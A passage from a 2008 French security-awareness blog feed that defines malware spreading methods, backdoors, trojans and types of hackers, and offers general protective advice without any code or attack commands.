lâcher sa charge active. Il y a donc une faille des mesures et procédures de sécurité et elles sont inefficaces ou l'agresseur possède une complicité à l'intérieur.&lt;br /&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="font-size:130%;color:#ff0000;"&gt;L'ouverture d'un courrier piégé :&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;Spam ou non, vous ne devez &lt;em&gt;&lt;span style="color:#993399;"&gt;jamais ouvrir un courrier dont vous ne connaissez pas l'expéditeur&lt;/span&gt;&lt;/em&gt; et vous ne devez jamais cliquer sur un lien dans un courrier, spam ou non. Un tel courrier piégé peut être assimilé à un cheval de Troie. Vous devez être équipé d'un anti-spam et d'un antivirus.&lt;br /&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="font-size:130%;color:#ff0000;"&gt;Usage d'un Fake ou Hoax :&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;Il s'agit de faux ayant l'apparence du vrai. On les trouve surtout sur les réseaux de P2P où les parasites portent, simplement, le nom des programmes les plus convoités (un jeu...), des chansons les plus téléchargées etc. ... et dans le courrier électronique (spam ou non). Le &lt;/strong&gt;&lt;strong&gt;&lt;a href="http://le-savoir-est-une-arme.blogspot.com/2008/11/phishing.html" target="_blank"&gt;phishing&lt;/a&gt; est de cette nature.&lt;br /&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="font-size:130%;color:#ff0000;"&gt;Usage d'une faille de sécurité :&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;Cas plus rares, le parasite est installé automatiquement depuis Internet, en exploitant des failles de sécurité. Techniques plus complexes comme le buffer-overflow et avec l'aide d'un &lt;/strong&gt;&lt;a href="http://le-savoir-est-une-arme.blogspot.com/2008/11/downloader.html" target="_blank"&gt;&lt;strong&gt;downloader&lt;/strong&gt;&lt;/a&gt;&lt;strong&gt;... Une technique consiste, par exemple, pour attaquer un système bien protégé, à utiliser un sniffer sur une liaison entre cet ordinateur et un ordinateur externe moins bien protégé auquel le premier fait appel régulièrement (par exemple transmissions quotidiennes depuis une filiale vers une maison mère). Le sniffer permet de repérer, dans les en-têtes, l'identité et le type des fichiers transmis régulièrement. Il suffit alors de faire passer le parasite pour l'un de ces fichiers sur la machine faillible pour infester la machine cible.&lt;br /&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="font-size:130%;color:#ff0000;"&gt;Usage de sites piégés :&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;Les &lt;/strong&gt;&lt;strong&gt;&lt;span style="color:#cc33cc;"&gt;sites piégés malsains&lt;/span&gt;&lt;/strong&gt;&lt;strong&gt; que vous visitez installent "à l'insu de votre plein gré", grâce à l'usage de&lt;span style="color:#cc33cc;"&gt; &lt;/span&gt;&lt;/strong&gt;&lt;strong&gt;&lt;span style="color:#cc33cc;"&gt;contrôles ActiveX&lt;/span&gt;&lt;/strong&gt;&lt;strong&gt; ou de &lt;/strong&gt;&lt;strong&gt;&lt;span style="color:#cc33cc;"&gt;langages de script&lt;/span&gt;&lt;/strong&gt;&lt;strong&gt;, des parasites de toutes nature. Ils profitent d'un certain laxisme de votre part dans le réglage de votre navigateur (surtout Internet Explorer) en ce qui concerne l'acceptation des &lt;/strong&gt;&lt;strong&gt;&lt;span style="color:#cc33cc;"&gt;ActiveX&lt;/span&gt;&lt;/strong&gt;&lt;strong&gt; et des &lt;/strong&gt;&lt;strong&gt;&lt;span style="color:#cc33cc;"&gt;&lt;a href="http://le-savoir-est-une-arme.blogspot.com/2008/11/script.html" target="_blank"&gt;scripts&lt;/a&gt;&lt;/span&gt;&lt;/strong&gt;&lt;strong&gt;. L'un des pièges pour conduire les scripts est l'usage d'images piégées dont les fameuses images invisibles, les &lt;/strong&gt;&lt;strong&gt;&lt;span style="color:#cc33cc;"&gt;WebBugs&lt;/span&gt;&lt;/strong&gt;&lt;strong&gt;.&lt;br /&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="font-size:130%;color:#ff0000;"&gt;Usage d'un binder :&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;Le parasite est saucissonné (découpé) en un tas de petits bouts, chacun étant suffisamment anodin pour être indétectable. Le &lt;a href="http://le-savoir-est-une-arme.blogspot.com/2008/11/le-binder.html" target="_blank"&gt;Binder&lt;/a&gt;&lt;/strong&gt;&lt;strong&gt; va assembler et créer le parasite à partir de petits bouts à l'apparence anodine. Le problème, en amont, est que le binder et les petits bouts du parasite ont pénétré le système. Il y a donc, également, une faille de sécurité à chercher. &lt;/strong&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8741137099428742325-4295940522548330394?l=le-savoir-est-une-arme.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://le-savoir-est-une-arme.blogspot.com/feeds/4295940522548330394/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://le-savoir-est-une-arme.blogspot.com/2008/11/methodes-de-diffusion-d-parasite.html#comment-form' title='0 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8741137099428742325/posts/default/4295940522548330394'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8741137099428742325/posts/default/4295940522548330394'/><link rel='alternate' type='text/html' href='http://le-savoir-est-une-arme.blogspot.com/2008/11/methodes-de-diffusion-d-parasite.html' title='Méthodes de diffusion d&amp;#39;un parasite'/><author><name>Le PHENIX</name><uri>http://www.blogger.com/profile/10082371022971256171</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_myG8IURVG2Y/SaRLJczhNII/AAAAAAAAAAM/lXISYq93EHw/S220/PhenixTV.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8741137099428742325.post-4840401577248177734</id><published>2008-11-03T09:39:00.000-08:00</published><updated>2009-03-06T08:30:36.074-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Le Backdoor'/><title type='text'>Le Backdoor</title><content type='html'>&lt;span style="font-size:180%;color:#000099;"&gt;&lt;strong&gt;&lt;em&gt;Le Backdoor&lt;/em&gt;&lt;/strong&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="font-size:130%;color:#3333ff;"&gt;Définition&lt;/span&gt; : outil de pirate créant une faille de sécurité en maintenant ouvert un port de communication. &lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="font-size:130%;color:#3333ff;"&gt;Description&lt;/span&gt; : Un Backdoor est une petite tâche chargée de maintenir un port ouvert afin de permettre, dans un second temps, quelquefois plusieurs mois plus tard (ou jamais), d'attaquer une machine. Le backdoor est diffusé par les mêmes voies que les virus afin d'infester un maximum de machines. Il va ensuite s'arranger pour être lancé automatiquement à chaque démarrage de la machine infestée puis va maintenir un port ouvert dès qu'il y a connexion. &lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="color:#993399;"&gt;Certains s'attaquent à des cannaux de communications particuliers comme IRC... Il va en rester là car son action se limite à cela. Il a préparé une attaque future. L'attaque, elle, se fera en 2 temps : &lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;L'attaquant utilisera d'abord un&lt;/strong&gt;&lt;strong&gt; &lt;a href="http://le-savoir-est-une-arme.blogspot.com/2008/11/scanners-de-ports.html" target="_blank"&gt;scanner d'adresses IPs et de ports&lt;/a&gt; pour chercher, sur Internet, une machine (une adresse IP parmi un intervalle d'adresses IPs) dont un port est maintenu ouvert par son backdoor, puis il effectuera une tentative d'exploit (exploitation d'une faille de sécurité) ou autre forme d'attaque préparée par le backdoor. Le backdoor n'est donc pas réellement une malveillance. Il la précède. Il se pose donc 2 problèmes, tous les deux de nature "faille de sécurité" :&lt;br /&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;Le maintien ouvert d'un port qui est, en lui-même, une faille de sécurité.&lt;/em&gt;&lt;br /&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;La faille de sécurité préalable qui à permis l'implantation de ce backdoor.&lt;/em&gt;&lt;br /&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;&lt;span style="color:#ff0000;"&gt;Nota :&lt;/span&gt;&lt;/em&gt; plusieurs &lt;/strong&gt;&lt;strong&gt;&lt;a href="http://le-savoir-est-une-arme.blogspot.com/2008/11/le-rat.html" target="_blank"&gt;RATs&lt;/a&gt; (Remote Administration Tools) portent, dans leur nom, le terme de "Backdoor", ce qui prête à confusion, les RATs n'étant pas des Backdoors, les Backdoors n'étant pas des RATs et les&lt;/strong&gt;&lt;strong&gt; &lt;a href="http://le-savoir-est-une-arme.blogspot.com/2008/11/cheval-de-troie-trojan.html" target="_blank"&gt;Trojans&lt;/a&gt; (chevaux de Troie) n'étant ni les uns ni les autres.&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;&lt;span style="color:#ff0000;"&gt;Nota :&lt;/span&gt;&lt;/em&gt; plusieurs attaquant peuvent "tomber" sur ce port ouvert et pas seulement celui qui à diffusé le backdoor. Pareillement un attaquant peut "tomber" sur le backdoor d'un autre pirate.&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;&lt;span style="color:#ff0000;"&gt;Nota :&lt;/span&gt;&lt;/em&gt; certains backdoors sont un peu plus "complets" et contiennent un downloader et/ou un installeur.&lt;br /&gt;&lt;/strong&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8741137099428742325-4840401577248177734?l=le-savoir-est-une-arme.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://le-savoir-est-une-arme.blogspot.com/feeds/4840401577248177734/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://le-savoir-est-une-arme.blogspot.com/2008/11/le-backdoor.html#comment-form' title='0 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8741137099428742325/posts/default/4840401577248177734'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8741137099428742325/posts/default/4840401577248177734'/><link rel='alternate' type='text/html' href='http://le-savoir-est-une-arme.blogspot.com/2008/11/le-backdoor.html' title='Le Backdoor'/><author><name>Le PHENIX</name><uri>http://www.blogger.com/profile/10082371022971256171</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_myG8IURVG2Y/SaRLJczhNII/AAAAAAAAAAM/lXISYq93EHw/S220/PhenixTV.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8741137099428742325.post-6704041119002514441</id><published>2008-11-03T09:17:00.000-08:00</published><updated>2009-03-06T08:05:07.946-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Fichiers à risque'/><title type='text'>Fichiers à risque</title><content type='html'>&lt;span style="font-size:180%;color:#000099;"&gt;&lt;strong&gt;Voici les types de fichiers dont il faut se méfier&lt;/strong&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:130%;"&gt;&lt;strong&gt;&lt;em&gt;Tous les fichiers (dont ceux attachés à un e-mail) se terminant par un suffixe sité ci-dessous sont succeptibles d'être une malveillance ou un trojan contenant une malveillance.&lt;/em&gt;&lt;/strong&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;img id="BLOGGER_PHOTO_ID_5264484995754149186" style="DISPLAY: block; MARGIN: 0px auto 10px; WIDTH: 400px; CURSOR: hand; HEIGHT: 240px; TEXT-ALIGN: center" alt="" src="http://4.bp.blogspot.com/_f87oXEJfKnY/SQ81NhFMxUI/AAAAAAAAAos/wLae97OGzeQ/s400/fichiers+%C3%A0+risque.bmp" border="0" /&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8741137099428742325-6704041119002514441?l=le-savoir-est-une-arme.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://le-savoir-est-une-arme.blogspot.com/feeds/6704041119002514441/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://le-savoir-est-une-arme.blogspot.com/2008/11/fichiers-risque.html#comment-form' title='0 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8741137099428742325/posts/default/6704041119002514441'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8741137099428742325/posts/default/6704041119002514441'/><link rel='alternate' type='text/html' href='http://le-savoir-est-une-arme.blogspot.com/2008/11/fichiers-risque.html' title='Fichiers à risque'/><author><name>Le PHENIX</name><uri>http://www.blogger.com/profile/10082371022971256171</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_myG8IURVG2Y/SaRLJczhNII/AAAAAAAAAAM/lXISYq93EHw/S220/PhenixTV.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_f87oXEJfKnY/SQ81NhFMxUI/AAAAAAAAAos/wLae97OGzeQ/s72-c/fichiers+%C3%A0+risque.bmp' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8741137099428742325.post-7442519092121620762</id><published>2008-11-03T06:17:00.000-08:00</published><updated>2009-03-06T08:42:03.774-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Le Trojan'/><title type='text'>Le Trojan</title><content type='html'>&lt;span style="font-size:180%;"&gt;&lt;strong&gt;&lt;span style="color:#ff0000;"&gt;&lt;/span&gt;&lt;/strong&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size:180%;"&gt;&lt;strong&gt;&lt;span style="color:#ff0000;"&gt;Trojans &lt;/span&gt;&lt;/strong&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="font-size:130%;color:#993399;"&gt;Définition :&lt;/span&gt;&lt;/strong&gt; &lt;strong&gt;&lt;em&gt;Un trojan, ou Cheval de Troie&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;C'est un programme utilisé comme véhicule pour introduire dans un dispositif un ou plusieurs autres programmes, généralement des parasites, cachés à l'intérieur du premier.&lt;br /&gt;&lt;br /&gt;Cette dichotomie complète entre le support et l'infection caractérise les chevaux de Troie.&lt;br /&gt;&lt;br /&gt;Un troisième laron est utilisé pour lier le véhicule et sa charge utile (payload) en un tout installable et mono-fichier : un &lt;a href="http://le-savoir-est-une-arme.blogspot.com/2008/11/le-binder.html" target="_blank"&gt;Binder&lt;/a&gt;&lt;/strong&gt;&lt;strong&gt;. Le binder permet de lier les deux premiers et permet également de les délier (de lâcher la charge utile - fonction de &lt;/strong&gt;&lt;a href="http://le-savoir-est-une-arme.blogspot.com/2008/11/le-dropper.html" target="_blank"&gt;&lt;strong&gt;Dropper&lt;/strong&gt;&lt;/a&gt; &lt;strong&gt;) lors de l'installation du véhicule.&lt;br /&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="font-size:130%;color:#993399;"&gt;Description des Trojans :&lt;/span&gt; &lt;/strong&gt;&lt;strong&gt;&lt;em&gt;C'est un programme ayant deux caractéristiques :&lt;br /&gt;&lt;/em&gt;&lt;br /&gt;Un comportement apparent utile (mais souvent futile, comme les économiseurs d'écrans, qui sont presque tous des trojans) à l'utilisateur de l'ordinateur (c'est le porteur, le vecteur, le véhicule, la méthode d'infestation, la partie visible du cheval que les grecs exhibèrent devant Troie).&lt;br /&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;Un comportement caché, malveillant, dû à l'implant véhiculé à l'intérieur du trojan (la charge utile, "Payload"), conduisant à la destruction ou la divulgation des données ou à l'ouverture d'une porte dans le système de communication et à l'espionnage ou à la publicité etc. ... (c'est la cohorte des grecs sortant en cachette du cheval pour ouvrir les portes de Troie et permettre au reste de l'armée grecque d'entrer et totalement détruire Troie).&lt;br /&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:130%;"&gt;&lt;strong&gt;&lt;span style="color:#993399;"&gt;On peut distinguer :&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;strong&gt;Les trojans conservant leur charge utile sur eux, en plus de leur activité apparante. Le nom de "trojan" est attribué, par abus de langage, à l'ensemble des deux ce qui conduit à une grande confusion. Ce type de cheval de Troie ne devrait être classifié qu'à la classe de malveillances qu'il embarque, par exemple à &lt;span style="color:#3366ff;"&gt;&lt;em&gt;&lt;a href="http://le-savoir-est-une-arme.blogspot.com/2008/11/le-keylogger.html" target="_blank"&gt;Keylogger&lt;/a&gt;&lt;/em&gt;&lt;/span&gt; ou à&lt;span style="color:#3366ff;"&gt;&lt;em&gt; &lt;a href="http://le-savoir-est-une-arme.blogspot.com/2008/11/le-backdoor.html" target="_blank"&gt;Backdoors&lt;/a&gt;&lt;/em&gt;&lt;/span&gt;...&lt;br /&gt;Les trojans lâchant leur charge utile. Les deux poursuivent leurs activités séparemment. Si le trojan est désinstallé, la charge utile (le parasite) poursuit son travail et inversement. Ce type de trojans est à juste titre classé à "trojan" et la charge utile lâchée est classée au nom de sa classe de parasites.&lt;br /&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;Les trojans qui n'ont pas d'autre activité (pas d'activité apparente) que de lâcher et installer un parasite. Ce type de trojans est classé à "&lt;em&gt;&lt;span style="color:#3366ff;"&gt;&lt;a href="http://le-savoir-est-une-arme.blogspot.com/2008/11/le-dropper.html" target="_blank"&gt;Dropper&lt;/a&gt;&lt;/span&gt;&lt;/em&gt;" et la charge utile lachée est classée au nom de sa classe d'implants malveillants, généralement un &lt;em&gt;&lt;span style="color:#3366ff;"&gt;&lt;a href="http://le-savoir-est-une-arme.blogspot.com/2008/11/definition-virus.html" target="_blank"&gt;virus&lt;/a&gt;&lt;/span&gt;&lt;/em&gt;.&lt;br /&gt;Les types de fichiers dont il faut se méfier :Tous les fichiers (dont ceux attachés à un e-mail) se terminant par un des suffixes &lt;/strong&gt;&lt;a href="http://le-savoir-est-une-arme.blogspot.com/2008/11/fichiers-risque.html" target="_blank"&gt;&lt;strong&gt;cité ici&lt;/strong&gt;&lt;/a&gt;&lt;strong&gt; sont succeptibles d'être une malveillance ou un trojan contenant une malveillance. &lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8741137099428742325-7442519092121620762?l=le-savoir-est-une-arme.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://le-savoir-est-une-arme.blogspot.com/feeds/7442519092121620762/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://le-savoir-est-une-arme.blogspot.com/2008/11/le-trojan.html#comment-form' title='0 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8741137099428742325/posts/default/7442519092121620762'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8741137099428742325/posts/default/7442519092121620762'/><link rel='alternate' type='text/html' href='http://le-savoir-est-une-arme.blogspot.com/2008/11/le-trojan.html' title='Le Trojan'/><author><name>Le PHENIX</name><uri>http://www.blogger.com/profile/10082371022971256171</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_myG8IURVG2Y/SaRLJczhNII/AAAAAAAAAAM/lXISYq93EHw/S220/PhenixTV.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8741137099428742325.post-6716287430711111117</id><published>2008-11-01T05:40:00.000-07:00</published><updated>2009-03-06T08:07:18.591-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='-Classement des Pirates-'/><title type='text'>Classement des Pirates</title><content type='html'>&lt;div align="center"&gt;&lt;span style="font-size:180%;color:#336666;"&gt;&lt;strong&gt;&lt;em&gt;Définition générale&lt;/em&gt;&lt;/strong&gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/_f87oXEJfKnY/SSf1Ikgp6FI/AAAAAAAABHY/yeJieOJSPHA/s1600-h/images%5B2%5D.jpg"&gt;&lt;img id="BLOGGER_PHOTO_ID_5271451416448854098" style="FLOAT: left; MARGIN: 0px 10px 10px 0px; WIDTH: 130px; CURSOR: hand; HEIGHT: 128px" alt="" src="http://1.bp.blogspot.com/_f87oXEJfKnY/SSf1Ikgp6FI/AAAAAAAABHY/yeJieOJSPHA/s200/images%5B2%5D.jpg" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Un pirate, en informatique, est une personne pénétrant sans autorisation un objet informatique par un moyen informatique. Aussi anodin que puisse paraître l'acte, il s'agit en droit français d'un délit ou d'un crime dont l'objet et / ou l'acte sont informatiques. L'acte en lui-même est un acte de piraterie, l'action est une action de piratage, l'acteur est un pirate.Divers classements stratifient les pirates :Il y a pirates et pirates et ils tiennent à ces distinguo. Tout un vocabulaire les classe, les hiérarchise... Ils y a ceux qui cherchent les failles pour les signaler aux directeurs informatiques, ceux qui les recherchent pour les exploiter, ceux qui pénètre pour l'exploit seulement et s'en vont en laissant juste une micro preuve pour leurs archives mais sans rien casser, ceux qui détruisent tout sur leur passage... &lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color:#ff0000;"&gt;&lt;span style="font-size:130%;"&gt;&lt;strong&gt;Votre pirate est l'un de ceux-là :&lt;/strong&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size:180%;color:#000099;"&gt;&lt;strong&gt;&lt;em&gt;Hacker :&lt;/em&gt;&lt;/strong&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Hackers - Bidouilleur - Fouineur. Acception "légale" du terme : passionné(e) d'informatique. Acception "illégale" du terme : pirate informatique. Un hacker est, à l'origine du terme, un étudiant particulièrement inventif au MIT (Massachusetts Institute of Technology - prestigieuse université et institution de recherches américaine en science et technologies située à Cambridge (Massachusetts) et leader mondial dans l'enseignement et la recherche en ces matières). Le hacking consiste alors à faire faire à une machine autre chose que ce pour quoi elle a été pensée au départ. L'aspect ludique de cette domination de la machine et la passion des plus brillants et audacieux a donné naissance aux premiers hackers en informatique, toujours au sein du MIT (par exemple, développer un jeu sur un ordinateur - le premier, d'une complexité inouïe à l'époque, étant de simplement faire se déplacer un spot sur un écran à partir d'une manette qui le commande (qu'il a fallu inventer également)).Aujourd'hui, le terme de hacker désigne toujours un informaticien brillant, capable de pénétrer profondément dans le cœur d'un système d'exploitation, d'un gestionnaire de réseau, d'une application... pour chercher la petite bête, la faille, le truc pas encore vu, pas encore exploité etc. ...Les hackers se divisent, selon une catégorisation popularisée par les médias, en :&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:130%;color:#993399;"&gt;&lt;strong&gt;&lt;em&gt;Black Hats&lt;/em&gt;&lt;/strong&gt;&lt;/span&gt; &lt;strong&gt;(chapeaux noirs)Hackers exploitant leurs trouvailles à des fins hostiles, parasitaires, maffieuses, terroristes... Ce sont les Pirates.&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;&lt;span style="font-size:130%;color:#993399;"&gt;Grey Hats&lt;/span&gt;&lt;/em&gt;&lt;/strong&gt; &lt;strong&gt;(chapeaux gris)Hackers exploitant leurs trouvailles à des fins de preuves et de démonstrations (pénétrations réelles dans des systèmes etc. ... sans nuisance). Motivés par le jugement porté sur eux par les autres hackers, ils communiquent leurs prouesses afin de se faire valoir mais ne dégradent rien, ne compromettent rien, ne divulguent rien des données auxquelles ils auraient pu accéder&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;&lt;span style="font-size:130%;color:#993399;"&gt;White Hats&lt;/span&gt;&lt;/em&gt; (chapeaux blancs)Hackers travaillant à la sécurisation des systèmes, par exemple en communiquant aux éditeurs leurs trouvailles et en leur laissant le temps de les corriger avant de rendre publics leurs travaux. On trouve parmi eux des consultants en sécurité informatique, des policiers spécialisés contre le cyber-terrorisme etc. ...&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;&lt;span style="font-size:180%;color:#000099;"&gt;Script Kiddies :&lt;/span&gt;&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Nom péjoratif donnés aux gamins apprentis pirates, totalement immatures et sans aucune intelligence, seulement capables de pomper un script hostile tout fait (et disponible sur le Net), d'en modifier sommairement un truc ou deux et de s'en servir (ou le lâcher sur le Net s'il s'agit d'un parasite).&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Gamins un peu férus d'informatique et qui tâtent au fruit défendu. Apprentis pirates, ils sont souvent ceux qui font le plus de dégâts, juste pour le "fun" ou pour se faire la main avant de s'attaquer à de plus gros morceaux. &lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Généralement animé de la seule intention de se faire remarquer dans le millieu très fermé des "grands" hackers, ou simplement pour le plaisir car c'est l'âge des boutons et des bêtises, ils lancent des attaques très violentes et destructrices afin de faire parler d'eux et sont, en ce sens, très dangereux.&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:180%;color:#000099;"&gt;&lt;strong&gt;&lt;em&gt;Lamer : &lt;/em&gt;&lt;/strong&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Le Lamer (prononcez lameur) est un pirate, comme les hackers, mais, à la différence d'eux, il est imbécile (ou jeune boutonneux complètement débutant). Incapable de faire quoi que ce soit par lui-même, il collectionne les hack et crack développés par de vrais hackers, qu'il trouve sur le Net, pour les exploiter. Il les utilise, généralement, sans rien y comprendre, juste pour voir ce que cela fait. Ne sachant pas s'en servir, les lamers sont très dangereux car leurs maladresses se traduisent parfois par la destruction des systèmes visités.&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Le Lamer est encore plus bas, dans la hiérarchie des pirates, que le Script kiddies. Il est franchement de bas niveau et le terme de "lamer" est particulièrement péjoratif.&lt;/strong&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8741137099428742325-6716287430711111117?l=le-savoir-est-une-arme.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://le-savoir-est-une-arme.blogspot.com/feeds/6716287430711111117/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://le-savoir-est-une-arme.blogspot.com/2008/11/classement-des-pirates.html#comment-form' title='0 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8741137099428742325/posts/default/6716287430711111117'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8741137099428742325/posts/default/6716287430711111117'/><link rel='alternate' type='text/html' href='http://le-savoir-est-une-arme.blogspot.com/2008/11/classement-des-pirates.html' title='Classement des Pirates'/><author><name>Le PHENIX</name><uri>http://www.blogger.com/profile/10082371022971256171</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_myG8IURVG2Y/SaRLJczhNII/AAAAAAAAAAM/lXISYq93EHw/S220/PhenixTV.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' 